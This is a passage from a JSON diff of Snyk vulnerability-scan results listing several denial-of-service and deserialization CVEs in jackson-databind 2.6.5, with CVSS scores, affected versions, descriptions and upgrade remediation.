Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", + "epssDetails": { + "percentile": "0.60309", + "probability": "0.00218", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36518" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-03-11T13:26:43.073121Z", + "functions_new": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-11T13:18:25Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-03-11T14:24:04Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.929583Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3582", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.201956Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", + "epssDetails": { + "percentile": "0.66401", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42004" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:21:18.588353Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:07:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T10:05:31.043255Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.261115Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", + "title": "Chromium Bugs" + }, + { + "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", + "title": "Documentation" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3590", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.284440Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", + "epssDetails": { + "percentile": "0.65501", + "probability": "0.00252", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42003" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:41:44.046865Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:22:10Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T09:54:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.258948Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.9)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.9" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1599", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.167922Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", + "epssDetails": { + "percentile": "0.97700", + "probability": "0.57112", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-7525" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qxxx-2pp7-5hmx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-09-14T14:43:48.569000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-10T21:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-09-14T14:43:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.385289Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1680", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1737", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.013603Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", + "epssDetails": { + "percentile": "0.92802", + "probability": "0.04801", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-15095" + ], + "CWE": [ + "CWE-184" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-11-07T13:13:32.343000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-06-26T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-11-09T03:13:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.857906Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Imre Rad" + ], + "semver": { + 